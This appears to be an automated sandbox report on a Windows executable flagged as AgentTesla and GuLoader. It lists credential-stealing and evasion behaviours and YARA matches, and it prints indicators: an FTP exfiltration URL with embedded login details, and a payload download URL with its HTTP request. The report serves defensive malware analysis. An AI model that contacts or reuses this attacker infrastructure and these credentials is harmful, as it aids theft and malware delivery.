
Windows Analysis Report
6culQoI97a.exe

Overview

General Information

Sample Name: 6culQoI97a.exe
Analysis ID: 755473
MD5: d9aa122b8c39444799e60eabbab69502
SHA1: 0175baf7a240c2050571a6df273a892e8b192d81
SHA256: 317b5db72d7c43ab63caffa88412395a1b010d24f234eb1b7eeabc92105db143

Detection

AgentTesla, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Antivirus detection for URL or domain
Yara detected GuLoader
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64native
  • 6culQoI97a.exe (PID: 9084 cmdline: C:\Users\user\Desktop\6culQoI97a.exe MD5: D9AA122B8C39444799E60EABBAB69502)
    • CasPol.exe (PID: 2424 cmdline: C:\Users\user\Desktop\6culQoI97a.exe MD5: 914F728C04D3EDDD5FBA59420E74E56B)
      • conhost.exe (PID: 2776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup
Malware Configuration Extractor (Agenttesla): {"Exfil Mode": "FTP", "FTP Info": "ftp://ftp.gettoner.com.mx/droid@gettoner.com.mxfedxunited543@"}

Source | Rule | Description | Author | Strings
00000009.00000000.972511906.0000000000FB0000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
00000002.00000002.1204047985.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmp | MALWARE_Win_AgentTeslaV3 | AgentTeslaV3 infostealer payload | ditekSHen | Strings:
          • 0x30f14:$s10: logins
          • 0x46998:$s10: logins
          • 0x4fe48:$s11: credential
          • 0x1e1e:$m1: yyyy-MM-dd hh-mm-ssCookieapplication/zipSCSC_.jpegScreenshotimage/jpeg/log.tmpKLKL_.html<html></html>Logtext/html[]Time
          • 0x2346:$m2: %image/jpg:Zone.Identifier\tmpG.tmp%urlkey%-f \Data\Tor\torrcp=%PostURL%127.0.0.1POST+%2B
          • 0x2892:$m3: >{CTRL}</font>Windows RDPcredentialpolicyblobrdgchrome{{{0}}}CopyToComputeHashsha512CopySystemDrive\WScript.ShellRegReadg401
          No Sigma rule has matched
          No Snort rule has matched



          AV Detection

          Source: 6culQoI97a.exe | ReversingLabs: Detection: 73%
          Source: 6culQoI97a.exe | Virustotal: Detection: 56%
          Source: ftp://ftp.gettoner.com.mx/droid | Avira URL Cloud: Label: malware
          Source: http://195.178.120.24/mhpgXW188.chm | Avira URL Cloud: Label: malware
          Source: 6culQoI97a.exe.9084.2.memstrmin | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "FTP Info": "ftp://ftp.gettoner.com.mx/droid@gettoner.com.mxfedxunited543@"}
          Source: 6culQoI97a.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: 6culQoI97a.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: C:\Users\user\Desktop\6culQoI97a.exe | Code function: 2_2_00406448 FindFirstFileA, FindClose, 2_2_00406448
          Source: C:\Users\user\Desktop\6culQoI97a.exe | Code function: 2_2_0040589C GetTempPathA, DeleteFileA, lstrcatA, lstrcatA, lstrlenA, FindFirstFileA, FindNextFileA, FindClose, 2_2_0040589C
          Source: C:\Users\user\Desktop\6culQoI97a.exe | Code function: 2_2_004027A1 FindFirstFileA, 2_2_004027A1
          Source: Joe Sandbox View | IP Address: 195.178.120.24
          Source: global traffic | HTTP traffic detected:
            GET /mhpgXW188.chm HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
            Host: 195.178.120.24
            Cache-Control: no-cache
          Source: unknown | TCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: CasPol.exe, 00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: ftp://ftp.gettoner.com.mx/droid
          Source: CasPol.exe, 00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:HTTP/1.1
          Source: CasPol.exe, 00000009.00000002.5786454694.0000000001396000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://195.178.120.24/mhpgXW188.chm
          Source: CasPol.exe, 00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://DynDns.comDynDNS
          Source: CasPol.exe, 00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://NwSpLV.com
          Source: 6culQoI97a.exe | String found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: 6culQoI97a.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: CasPol.exe, 00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha